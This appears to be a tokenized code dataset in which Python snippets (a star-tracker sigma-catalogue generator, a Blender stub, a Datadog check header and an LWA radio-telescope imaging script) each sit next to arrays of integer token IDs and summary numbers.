the calculated mu_n for the current star mu_n_i = temp4.Ang_Distance.mean() # Multiply (mu_n_i) by (1/6) since sigma_i = Ang_distance_i, for all (i) mu_n_i = mu_n_i/6 # Appends the entry to the SIGMA_CATALOGUE dataframe SIGMA_CATALOGUE = SIGMA_CATALOGUE.append({'Star_ID':star_id_i, 'mu_n':mu_n_i}, ignore_index=True) # Releases memory back to OS if i%100 == 0: gc.collect() print(i/100) # Stop clock-1 end1 = time.time() - start1 # Print time taken print('Time Taken - ', np.round(end1,3)) return SIGMA_CATALOGUE def main(): ''' main function ''' # Reads 'Master' star catalogue CATALOGUE = pd.read_csv(r"F:\IIT Bombay\SatLab\Star Tracker\Programs\Catalogues\Modified Star Catalogue.csv") # StarID: The database primary key from a larger "master database" of stars # Mag: The star's apparent visual magnitude # RA, Dec: The star's right ascension and declination, for epoch 2000.0 (Unit: RA - hrs; Dec - degrees) # Sorts <CATALOGUE> CATALOGUE.sort_values('Mag', inplace=True) # Run function result = genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20) # Sort <result> result.sort_values('mu_n', inplace=True) # Generates CSV of <result> result.to_csv('SigmaCatalogue.csv', index = False) print('Done') if __name__ == '__main__': main()
[ 11748, 299, 32152, 355, 45941, 201, 198, 11748, 19798, 292, 355, 279, 67, 201, 198, 11748, 640, 11, 308, 66, 201, 198, 6738, 402, 53, 62, 39075, 5119, 62, 13746, 1330, 32558, 45767, 201, 198, 201, 198, 4299, 2429, 50, 13495, 39075, 5119, 7, 34, 1404, 1847, 7730, 8924, 11, 2153, 62, 32374, 796, 718, 11, 376, 8874, 62, 32374, 796, 1160, 2599, 201, 198, 220, 220, 220, 705, 7061, 201, 198, 220, 220, 220, 2980, 689, 262, 1612, 286, 262, 264, 13495, 329, 1123, 3491, 287, 262, 34614, 13, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 31669, 1022, 3491, 317, 290, 3491, 347, 318, 5447, 355, 357, 16, 14, 21, 8, 286, 262, 32558, 220, 201, 198, 220, 220, 220, 5253, 1022, 262, 734, 5788, 13, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 8013, 3815, 286, 264, 13495, 389, 10488, 329, 3491, 317, 284, 790, 584, 3491, 220, 201, 198, 220, 220, 220, 287, 262, 34614, 326, 389, 663, 16936, 23788, 11, 1312, 13, 68, 1539, 477, 883, 201, 198, 220, 220, 220, 5788, 1626, 257, 18620, 376, 8874, 5447, 416, 376, 8874, 62, 32374, 13, 201, 198, 220, 220, 220, 770, 900, 286, 264, 13495, 3815, 318, 5447, 355, 264, 13495, 62, 77, 13, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 383, 1612, 286, 477, 262, 4847, 286, 264, 13495, 62, 77, 3607, 514, 38779, 62, 77, 13, 201, 198, 220, 220, 220, 770, 1612, 1988, 318, 20312, 351, 262, 11188, 3491, 317, 13, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 770, 1429, 29819, 329, 790, 3491, 287, 262, 34614, 11, 290, 262, 3491, 32373, 201, 198, 220, 220, 220, 262, 11188, 38779, 62, 77, 3815, 389, 2927, 515, 287, 257, 1366, 14535, 13, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 40117, 201, 198, 220, 220, 220, 24200, 438, 201, 198, 220, 220, 220, 38348, 1847, 7730, 8924, 1058, 279, 67, 13, 6601, 14535, 201, 198, 220, 220, 220, 220, 220, 220, 220, 383, 705, 9866, 6, 3491, 34614, 319, 543, 262, 2163, 2499, 201, 198, 201, 198, 220, 220, 220, 2153, 62, 32374, 1058, 12462, 12, 4122, 1271, 11, 4277, 796, 718, 201, 198, 220, 220, 220, 220, 220, 220, 220, 383, 6727, 14735, 4179, 286, 5788, 326, 389, 2672, 287, 262, 4941, 34614, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 376, 8874, 62, 32374, 25, 12462, 12, 4122, 1271, 11, 4277, 796, 1160, 201, 198, 220, 220, 220, 220, 220, 220, 220, 2896, 1127, 262, 18620, 16874, 357, 259, 7370, 8, 543, 1357, 5605, 689, 543, 5788, 422, 262, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 34614, 389, 284, 307, 3177, 355, 16936, 23788, 329, 257, 1813, 3491, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 16409, 201, 198, 220, 220, 220, 35656, 201, 198, 220, 220, 220, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 1058, 279, 67, 13, 6601, 14535, 201, 198, 220, 220, 220, 220, 220, 220, 220, 383, 1366, 14535, 2927, 515, 422, 262, 3491, 32373, 290, 511, 11188, 38779, 62, 77, 201, 198, 220, 220, 220, 705, 7061, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 7253, 8801, 12, 16, 201, 198, 220, 220, 220, 923, 16, 796, 640, 13, 2435, 3419, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 2980, 378, 10770, 34614, 1912, 319, 6727, 14735, 4179, 201, 198, 220, 220, 220, 20218, 15, 796, 38348, 1847, 7730, 8924, 58, 34, 1404, 1847, 7730, 8924, 13, 13436, 19841, 2153, 62, 32374, 60, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 7913, 286, 15274, 287, 262, 1334, 5722, 34614, 201, 198, 220, 220, 220, 15274, 796, 20218, 15, 13, 43358, 58, 15, 60, 201, 198, 220, 220, 220, 1303, 1874, 1039, 262, 6376, 286, 1279, 29510, 15, 29, 201, 198, 220, 220, 220, 20218, 15, 13, 9630, 796, 1351, 7, 9521, 7, 8516, 4008, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 12578, 82, 2472, 1271, 286, 5788, 287, 1279, 29510, 15, 29, 290, 262, 357, 77, 8, 55, 7, 77, 12, 16, 13219, 3748, 17790, 583, 3491, 201, 198, 220, 220, 220, 3601, 10786, 15057, 286, 5788, 532, 46083, 15274, 8, 201, 198, 220, 220, 220, 3601, 10786, 15057, 286, 3748, 17790, 583, 3491, 28, 46083, 357, 8516, 12, 16, 27493, 8516, 8, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 20768, 1096, 262, 1271, 286, 34820, 284, 1011, 1295, 201, 198, 220, 220, 220, 645, 62, 2676, 796, 357, 8516, 8, 220, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 20768, 1096, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 201, 198, 220, 220, 220, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 796, 279, 67, 13, 6601, 19778, 7, 28665, 82, 28, 17816, 8248, 62, 2389, 3256, 705, 30300, 62, 77, 6, 12962, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 329, 1312, 287, 2837, 7, 3919, 62, 2676, 2599, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 536, 8516, 4049, 611, 281, 24415, 4539, 3675, 1271, 286, 1695, 15274, 287, 1279, 29510, 15, 29, 201, 198, 220, 220, 220, 220, 220, 220, 220, 6818, 1312, 27, 7, 8516, 828, 705, 15732, 12331, 25, 11629, 803, 3675, 1695, 1271, 286, 15274, 6, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2980, 689, 1279, 29510, 16, 29, 1366, 14535, 543, 468, 262, 357, 72, 532, 294, 8, 3491, 286, 1279, 29510, 15, 29, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 46152, 515, 357, 8516, 12, 16, 8, 1661, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 16, 796, 279, 67, 13, 6601, 19778, 7, 28665, 82, 796, 37250, 8248, 62, 2389, 16, 41707, 3861, 62, 16, 3256, 705, 10707, 62, 16, 3256, 705, 13436, 62, 16, 6, 12962, 201, 198, 220, 220, 220, 220, 220, 220, 220, 264, 16, 11, 2179, 11, 875, 11, 2153, 796, 20218, 15, 13, 346, 420, 58, 72, 60, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 16, 13, 17946, 58, 15, 60, 796, 685, 82, 16, 60, 1343, 685, 430, 60, 1343, 685, 12501, 60, 1343, 685, 19726, 60, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 16, 796, 279, 67, 13, 1102, 9246, 26933, 29510, 16, 60, 9, 7, 8516, 12, 16, 828, 8856, 62, 9630, 28, 17821, 8, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 41835, 1988, 286, 262, 3491, 62, 2389, 329, 543, 38779, 62, 77, 481, 307, 10488, 201, 198, 220, 220, 220, 220, 220, 220, 220, 3491, 62, 312, 62, 72, 796, 264, 16, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2980, 689, 1279, 29510, 17, 29, 1366, 14535, 416, 23345, 3815, 286, 1279, 29510, 15, 29, 290, 12047, 262, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 357, 72, 532, 400, 8, 5752, 422, 340, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 17, 796, 20218, 15, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 17, 796, 20218, 17, 13, 14781, 26933, 72, 4357, 16488, 796, 657, 8, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1874, 1039, 262, 6376, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 17, 13, 9630, 796, 1351, 7, 9521, 7, 15, 11, 15274, 12, 16, 4008, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1482, 9246, 268, 689, 1279, 29510, 16, 29, 1222, 1279, 29510, 17, 29, 1735, 12, 1525, 12, 1589, 884, 326, 7186, 1279, 29510, 18, 29, 468, 357, 23, 8, 15180, 13318, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 18, 796, 279, 67, 13, 1102, 9246, 26933, 29510, 16, 11, 20218, 17, 4357, 16488, 28, 16, 8, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 7152, 3723, 15180, 286, 1279, 29510, 18, 29, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 18, 13, 28665, 82, 796, 37250, 8248, 62, 2389, 16, 41707, 3861, 62, 16, 3256, 705, 10707, 62, 16, 3256, 705, 13436, 62, 16, 3256, 705, 8248, 62, 2389, 17, 3256, 705, 3861, 62, 17, 3256, 705, 10707, 62, 17, 3256, 705, 13436, 62, 17, 20520, 201, 198, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 27131, 378, 32558, 5253, 1022, 262, 734, 5788, 1944, 287, 790, 5752, 287, 1279, 29510, 18, 29, 201, 198, 220, 220, 220, 220, 220, 220, 220, 951, 82, 796, 37250, 3861, 62, 16, 3256, 705, 3861, 62, 17, 3256, 705, 10707, 62, 16, 3256, 705, 10707, 62, 17, 20520, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 18, 17816, 13450, 62, 45767, 20520, 796, 20218, 18, 13, 39014, 7, 21413, 45767, 11, 16488, 796, 352, 11, 951, 62, 14933, 796, 951, 82, 8, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2980, 689, 1279, 29510, 19, 29, 416, 17246, 15274, 422, 1279, 29510, 18, 29, 3025, 32558, 18868, 318, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1342, 621, 4961, 284, 262, 18620, 376, 8874, 4179, 201, 198, 220, 220, 220, 220, 220, 220, 220, 20218, 19, 796, 20218, 18, 58, 29510, 18, 13, 13450, 62, 45767, 19841, 376, 8874, 62, 32374, 60, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 41835, 262, 1988, 286, 262, 10488, 38779, 62, 77, 329, 262, 1459, 3491, 201, 198, 220, 220, 220, 220, 220, 220, 220, 38779, 62, 77, 62, 72, 796, 20218, 19, 13, 13450, 62, 45767, 13, 32604, 3419, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 7854, 541, 306, 357, 30300, 62, 77, 62, 72, 8, 416, 357, 16, 14, 21, 8, 1201, 264, 13495, 62, 72, 796, 2895, 62, 30246, 62, 72, 11, 329, 477, 357, 72, 8, 201, 198, 220, 220, 220, 220, 220, 220, 220, 38779, 62, 77, 62, 72, 796, 38779, 62, 77, 62, 72, 14, 21, 201, 198, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2034, 2412, 262, 5726, 284, 262, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 1366, 14535, 201, 198, 220, 220, 220, 220, 220, 220, 220, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 796, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 13, 33295, 15090, 6, 8248, 62, 2389, 10354, 7364, 62, 312, 62, 72, 11, 705, 30300, 62, 77, 10354, 30300, 62, 77, 62, 72, 5512, 8856, 62, 9630, 28, 17821, 8, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 48691, 4088, 736, 284, 7294, 201, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1312, 4, 3064, 6624, 657, 25, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 308, 66, 13, 33327, 3419, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7, 72, 14, 3064, 8, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 13707, 8801, 12, 16, 220, 220, 220, 201, 198, 220, 220, 220, 886, 16, 796, 640, 13, 2435, 3419, 532, 923, 16, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 12578, 640, 2077, 201, 198, 220, 220, 220, 3601, 10786, 7575, 30222, 532, 46083, 45941, 13, 744, 7, 437, 16, 11, 18, 4008, 201, 198, 220, 220, 220, 220, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1441, 33993, 5673, 62, 34, 1404, 1847, 7730, 8924, 201, 198, 201, 198, 4299, 1388, 33529, 201, 198, 220, 220, 220, 705, 7061, 201, 198, 220, 220, 220, 1388, 2163, 201, 198, 220, 220, 220, 705, 7061, 201, 198, 220, 220, 220, 1303, 4149, 82, 705, 18254, 6, 3491, 34614, 201, 198, 220, 220, 220, 38348, 1847, 7730, 8924, 796, 279, 67, 13, 961, 62, 40664, 7, 81, 1, 37, 7479, 40, 2043, 48918, 59, 20245, 17822, 59, 8248, 26885, 59, 15167, 82, 59, 49015, 947, 59, 5841, 1431, 2907, 16758, 5119, 13, 40664, 4943, 201, 198, 220, 220, 220, 1303, 2907, 2389, 25, 383, 6831, 4165, 1994, 422, 257, 4025, 366, 9866, 6831, 1, 286, 5788, 201, 198, 220, 220, 220, 1303, 2944, 25, 383, 3491, 338, 4156, 5874, 14735, 201, 198, 220, 220, 220, 1303, 17926, 11, 4280, 25, 383, 3491, 338, 826, 10570, 3004, 290, 2377, 1883, 11, 329, 36835, 4751, 13, 15, 357, 26453, 25, 17926, 532, 36201, 26, 4280, 532, 7370, 8, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 311, 2096, 1279, 34, 1404, 1847, 7730, 8924, 29, 201, 198, 220, 220, 220, 38348, 1847, 7730, 8924, 13, 30619, 62, 27160, 10786, 13436, 3256, 287, 5372, 28, 17821, 8, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 5660, 2163, 201, 198, 220, 220, 220, 1255, 796, 2429, 50, 13495, 39075, 5119, 7, 34, 1404, 1847, 7730, 8924, 11, 2153, 62, 32374, 796, 718, 11, 376, 8874, 62, 32374, 796, 1160, 8, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 33947, 1279, 20274, 29, 201, 198, 220, 220, 220, 1255, 13, 30619, 62, 27160, 10786, 30300, 62, 77, 3256, 287, 5372, 28, 17821, 8, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 220, 201, 198, 220, 220, 220, 1303, 2980, 689, 44189, 286, 1279, 20274, 29, 201, 198, 220, 220, 220, 1255, 13, 1462, 62, 40664, 10786, 50, 13495, 39075, 5119, 13, 40664, 3256, 6376, 796, 10352, 8, 201, 198, 220, 220, 220, 3601, 10786, 45677, 11537, 201, 198, 220, 220, 220, 220, 201, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 201, 198, 220, 220, 220, 1388, 3419, 201, 198 ]
2.34305
2,367
import bpy from mathutils import Color if __name__ == "__main__": create(bpy.context.active_object)
[ 11748, 275, 9078, 628, 198, 6738, 10688, 26791, 1330, 5315, 628, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 2251, 7, 65, 9078, 13, 22866, 13, 5275, 62, 15252, 8 ]
2.891892
37
# -*- coding: utf-8 -*- from checks import AgentCheck from boto3.session import Session import datetime
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 8794, 1330, 15906, 9787, 198, 6738, 275, 2069, 18, 13, 29891, 1330, 23575, 198, 11748, 4818, 8079, 628 ]
3.181818
33
import datetime as DT import numpy as NP import matplotlib.pyplot as PLT import matplotlib.colors as PLTC import scipy.constants as FCNST from astropy.io import fits from astropy.io import ascii from astropy.table import Table import progressbar as PGB import antenna_array as AA import geometry as GEOM import my_DSP_modules as DSP import sim_observe as SIM import ipdb as PDB LWA_reformatted_datafile_prefix = '/data3/t_nithyanandan/project_MOFF/data/samples/lwa_reformatted_data_test' LWA_pol0_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-0.fits' LWA_pol1_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-1.fits' max_n_timestamps = 9 hdulist0 = fits.open(LWA_pol0_reformatted_datafile) hdulist1 = fits.open(LWA_pol1_reformatted_datafile) extnames = [h.header['EXTNAME'] for h in hdulist0] lat = hdulist0['PRIMARY'].header['latitude'] f0 = hdulist0['PRIMARY'].header['center_freq'] nchan = hdulist0['PRIMARY'].header['nchan'] dt = 1.0 / hdulist0['PRIMARY'].header['sample_rate'] freqs = hdulist0['freqs'].data channel_width = freqs[1] - freqs[0] f_center = f0 bchan = 63 echan = 963 max_antenna_radius = 40.0 # in meters # max_antenna_radius = 75.0 # in meters antid = hdulist0['Antenna Positions'].data['Antenna'] antpos = hdulist0['Antenna Positions'].data['Position'] # antpos -= NP.mean(antpos, axis=0).reshape(1,-1) core_ind = NP.logical_and((NP.abs(antpos[:,0]) < max_antenna_radius), (NP.abs(antpos[:,1]) < max_antenna_radius)) # core_ind = NP.logical_and((NP.abs(antpos[:,0]) <= NP.max(NP.abs(antpos[:,0]))), (NP.abs(antpos[:,1]) < NP.max(NP.abs(antpos[:,1])))) ant_info = NP.hstack((antid[core_ind].reshape(-1,1), antpos[core_ind,:])) n_antennas = ant_info.shape[0] ants = [] aar = AA.AntennaArray() for i in xrange(n_antennas): ant = AA.Antenna('{0:0d}'.format(int(ant_info[i,0])), lat, ant_info[i,1:], f0, nsamples=nchan) ant.f = ant.f0 + DSP.spectax(2*nchan, dt, shift=True) ants += [ant] aar = aar + ant timestamps = hdulist0['TIMESTAMPS'].data['timestamp'] if max_n_timestamps is None: max_n_timestamps = len(timestamps) else: max_n_timestamps = min(max_n_timestamps, len(timestamps)) timestamps = timestamps[:max_n_timestamps] stand_cable_delays = NP.loadtxt('/data3/t_nithyanandan/project_MOFF/data/samples/cable_delays.txt', skiprows=1) antennas = stand_cable_delays[:,0].astype(NP.int).astype(str) cable_delays = stand_cable_delays[:,1] iar = AA.InterferometerArray(antenna_array=aar) iar.grid() count = 0 for i in xrange(max_n_timestamps): timestamp = timestamps[i] antenna_level_update_info = {} antenna_level_update_info['antenna_array'] = {} antenna_level_update_info['antenna_array']['timestamp'] = timestamp antenna_level_update_info['antennas'] = [] for label in iar.antenna_array.antennas: adict = {} adict['label'] = label adict['action'] = 'modify' adict['timestamp'] = timestamp adict['Et'] = {} adict['flags'] = {} adict['delaydict'] = {} if label in hdulist0[timestamp].columns.names: adict['t'] = NP.arange(nchan) * dt Et_P1 = hdulist0[timestamp].data[label] adict['Et']['P1'] = Et_P1[:,0] + 1j * Et_P1[:,1] adict['flags']['P1'] = False # adict['gridfunc_freq'] = 'scale' # adict['wtsinfo_P1'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}] # adict['gridmethod'] = 'NN' # adict['distNN'] = 0.5 * FCNST.c / f0 # adict['tol'] = 1.0e-6 # adict['maxmatch'] = 1 adict['delaydict']['P1'] = {} adict['delaydict']['P1']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency'] # adict['delaydict_P1']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label] adict['delaydict']['P1']['delays'] = cable_delays[antennas == label] adict['delaydict']['P1']['fftshifted'] = True else: adict['flags']['P1'] = True if label in hdulist1[timestamp].columns.names: adict['t'] = NP.arange(nchan) * dt Et_P2 = hdulist1[timestamp].data[label] adict['Et']['P2'] = Et_P2[:,0] + 1j * Et_P2[:,1] adict['flags']['P2'] = False # adict['gridfunc_freq'] = 'scale' # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}] # adict['gridmethod'] = 'NN' # adict['distNN'] = 0.5 * FCNST.c / f0 # adict['tol'] = 1.0e-6 # adict['maxmatch'] = 1 adict['delaydict']['P2'] = {} adict['delaydict']['P2']['frequencies'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data['frequency'] # adict['delaydict_P2']['delays'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data[label] adict['delaydict']['P2']['delays'] = cable_delays[antennas == label] adict['delaydict']['P2']['fftshifted'] = True else: adict['flags']['P2'] = True antenna_level_update_info['antennas'] += [adict] # if label in hdulist1[timestamp].columns.names: # adict['t'] = NP.arange(nchan) * dt # Et_P2 = hdulist1[timestamp].data[label] # adict['Et_P2'] = Et_P2[:,0] + 1j * Et_P2[:,1] # adict['flag_P2'] = False # # adict['gridfunc_freq'] = 'scale' # # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}] # # adict['gridmethod'] = 'NN' # # adict['distNN'] = 0.5 * FCNST.c / f0 # # adict['tol'] = 1.0e-6 # # adict['maxmatch'] = 1 # adict['delaydict_P2'] = {} # adict['delaydict_P2']['pol'] = 'P2' # adict['delaydict_P2']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency'] # # adict['delaydict_P2']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label] # adict['delaydict_P2']['delays'] = cable_delays[antennas == label] # adict['delaydict_P2']['fftshifted'] = True # else: # adict['flag_P2'] = True interferometer_level_update_info = {} interferometer_level_update_info['interferometers'] = [] for label in iar.interferometers: idict = {} idict['label'] = label idict['action'] = 'modify' idict['gridfunc_freq'] = 'scale' idict['gridmethod'] = 'NN' idict['distNN'] = 0.5 * FCNST.c / f0 idict['tol'] = 1.0e-6 idict['maxmatch'] = 1 idict['wtsinfo'] = {} for pol in ['P11', 'P12', 'P21', 'P22']: idict['wtsinfo'][pol] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}] interferometer_level_update_info['interferometers'] += [idict] iar.update(antenna_level_updates=antenna_level_update_info, interferometer_level_updates=interferometer_level_update_info, do_correlate='FX', parallel=True, verbose=True) iar.grid_convolve(pol='P11', method='NN', distNN=0.5*FCNST.c/f0, tol=1.0e-6, maxmatch=1, identical_interferometers=True, gridfunc_freq='scale', mapping='weighted', wts_change=False, parallel=True, pp_method='queue') imgobj = AA.NewImage(interferometer_array=iar, pol='P11') imgobj.imagr(weighting='natural', pol='P11') if i == 0: avg_img = imgobj.img['P11'] else: avg_img += imgobj.img['P11'] avg_img /= max_n_timestamps fig = PLT.figure() ax = fig.add_subplot(111) imgplot = ax.imshow(NP.mean(avg_img, axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max())) # posplot, = ax.plot(skypos[:,0], skypos[:,1], 'o', mfc='none', mec='black', mew=1, ms=8) ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max()) ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max()) PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_sample_image_{0:0d}_iterations.png'.format(max_n_timestamps), bbox_inches=0) PDB.set_trace() PLT.close(fig) fig = PLT.figure() ax = fig.add_subplot(111) imgplot = ax.imshow(NP.mean(imgobj.beam['P11'], axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max())) ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max()) ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max()) PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_psf.png'.format(itr), bbox_inches=0) PLT.close(fig)
[ 11748, 4818, 8079, 355, 24311, 198, 11748, 299, 32152, 355, 28498, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 9297, 51, 198, 11748, 2603, 29487, 8019, 13, 4033, 669, 355, 9297, 4825, 198, 11748, 629, 541, 88, 13, 9979, 1187, 355, 10029, 45, 2257, 198, 6738, 6468, 28338, 13, 952, 1330, 11414, 198, 6738, 6468, 28338, 13, 952, 1330, 355, 979, 72, 198, 6738, 6468, 28338, 13, 11487, 1330, 8655, 198, 11748, 4371, 5657, 355, 350, 4579, 198, 11748, 20509, 62, 18747, 355, 15923, 198, 11748, 22939, 355, 22319, 2662, 198, 11748, 616, 62, 35, 4303, 62, 18170, 355, 360, 4303, 198, 11748, 985, 62, 672, 2655, 303, 355, 23749, 198, 11748, 20966, 9945, 355, 350, 11012, 198, 198, 43, 15543, 62, 260, 687, 16898, 62, 7890, 7753, 62, 40290, 796, 31051, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 7890, 14, 82, 12629, 14, 75, 10247, 62, 260, 687, 16898, 62, 7890, 62, 9288, 6, 198, 43, 15543, 62, 16104, 15, 62, 260, 687, 16898, 62, 7890, 7753, 796, 406, 15543, 62, 260, 687, 16898, 62, 7890, 7753, 62, 40290, 1343, 45302, 16104, 12, 15, 13, 21013, 6, 198, 43, 15543, 62, 16104, 16, 62, 260, 687, 16898, 62, 7890, 7753, 796, 406, 15543, 62, 260, 687, 16898, 62, 7890, 7753, 62, 40290, 1343, 45302, 16104, 12, 16, 13, 21013, 6, 198, 9806, 62, 77, 62, 16514, 395, 9430, 796, 860, 198, 198, 31298, 377, 396, 15, 796, 11414, 13, 9654, 7, 43, 15543, 62, 16104, 15, 62, 260, 687, 16898, 62, 7890, 7753, 8, 198, 31298, 377, 396, 16, 796, 11414, 13, 9654, 7, 43, 15543, 62, 16104, 16, 62, 260, 687, 16898, 62, 7890, 7753, 8, 198, 2302, 14933, 796, 685, 71, 13, 25677, 17816, 13918, 20608, 20520, 329, 289, 287, 289, 67, 377, 396, 15, 60, 198, 15460, 796, 289, 67, 377, 396, 15, 17816, 4805, 3955, 13153, 6, 4083, 25677, 17816, 15460, 3984, 20520, 198, 69, 15, 796, 289, 67, 377, 396, 15, 17816, 4805, 3955, 13153, 6, 4083, 25677, 17816, 16159, 62, 19503, 80, 20520, 198, 77, 3147, 796, 289, 67, 377, 396, 15, 17816, 4805, 3955, 13153, 6, 4083, 25677, 17816, 77, 3147, 20520, 198, 28664, 796, 352, 13, 15, 1220, 289, 67, 377, 396, 15, 17816, 4805, 3955, 13153, 6, 4083, 25677, 17816, 39873, 62, 4873, 20520, 198, 19503, 48382, 796, 289, 67, 377, 396, 15, 17816, 19503, 48382, 6, 4083, 7890, 198, 17620, 62, 10394, 796, 2030, 48382, 58, 16, 60, 532, 2030, 48382, 58, 15, 60, 198, 69, 62, 16159, 796, 277, 15, 198, 65, 3147, 796, 8093, 198, 3055, 272, 796, 860, 5066, 198, 9806, 62, 415, 13713, 62, 42172, 796, 2319, 13, 15, 1303, 287, 10700, 198, 2, 3509, 62, 415, 13713, 62, 42172, 796, 5441, 13, 15, 1303, 287, 10700, 198, 198, 415, 312, 796, 289, 67, 377, 396, 15, 17816, 13217, 13713, 18574, 1756, 6, 4083, 7890, 17816, 13217, 13713, 20520, 198, 415, 1930, 796, 289, 67, 377, 396, 15, 17816, 13217, 13713, 18574, 1756, 6, 4083, 7890, 17816, 26545, 20520, 198, 2, 1885, 1930, 48185, 28498, 13, 32604, 7, 415, 1930, 11, 16488, 28, 15, 737, 3447, 1758, 7, 16, 12095, 16, 8, 198, 198, 7295, 62, 521, 796, 28498, 13, 6404, 605, 62, 392, 19510, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 15, 12962, 1279, 3509, 62, 415, 13713, 62, 42172, 828, 357, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 16, 12962, 1279, 3509, 62, 415, 13713, 62, 42172, 4008, 198, 2, 4755, 62, 521, 796, 28498, 13, 6404, 